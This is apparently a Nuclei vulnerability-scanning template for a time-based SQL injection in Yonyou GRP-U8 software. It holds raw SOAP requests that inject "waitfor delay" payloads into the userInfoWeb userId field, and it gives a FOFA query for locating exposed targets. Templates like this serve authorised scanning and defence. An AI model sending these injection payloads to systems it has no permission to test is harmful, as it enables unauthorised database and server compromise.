http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - "POST /services/userInfoWeb HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\nSOAPAction: \nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://service.pt.midas.ufgov.com\">\n  <soapenv:Header/>\n  <soapenv:Body>\n      <ser:getUserNameById soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n        <userId xsi:type=\"soapenc:string\" xmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">';waitfor delay '0:0:4'--</userId>\n      </ser:getUserNameById>\n  </soapenv:Body>\n</soapenv:Envelope>\n"
        - "POST /services/userInfoWeb HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\nSOAPAction: \nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://service.pt.midas.ufgov.com\">\n  <soapenv:Header/>\n  <soapenv:Body>\n      <ser:getUserNameById soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n        <userId xsi:type=\"soapenc:string\" xmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">';waitfor delay '0:0:8'--</userId>\n      </ser:getUserNameById>\n  </soapenv:Body>\n</soapenv:Envelope>\n"
id: yongyouGRP-U8-userInfoWeb-sql
info:
    author: Superhero
    description: |-
        fofa: title="云联应用系统接入平台"
        用友GRP-U8R10行政事业内控管理软件 userInfoWeb接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。
    name: 用友GRP-U8 userInfoWeb SQL延时注入漏洞 (XVE-2024-10539)
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488065&idx=1&sn=e500c9b0dd9ea1c3094605b1100a9766&chksm=c267a772f5102e649cb27db01bf856334fcf7c9802ce13759de277e52be6423bc6f9464dffc4&token=1431500657&lang=zh_CN#rd
    severity: high
    tags: []
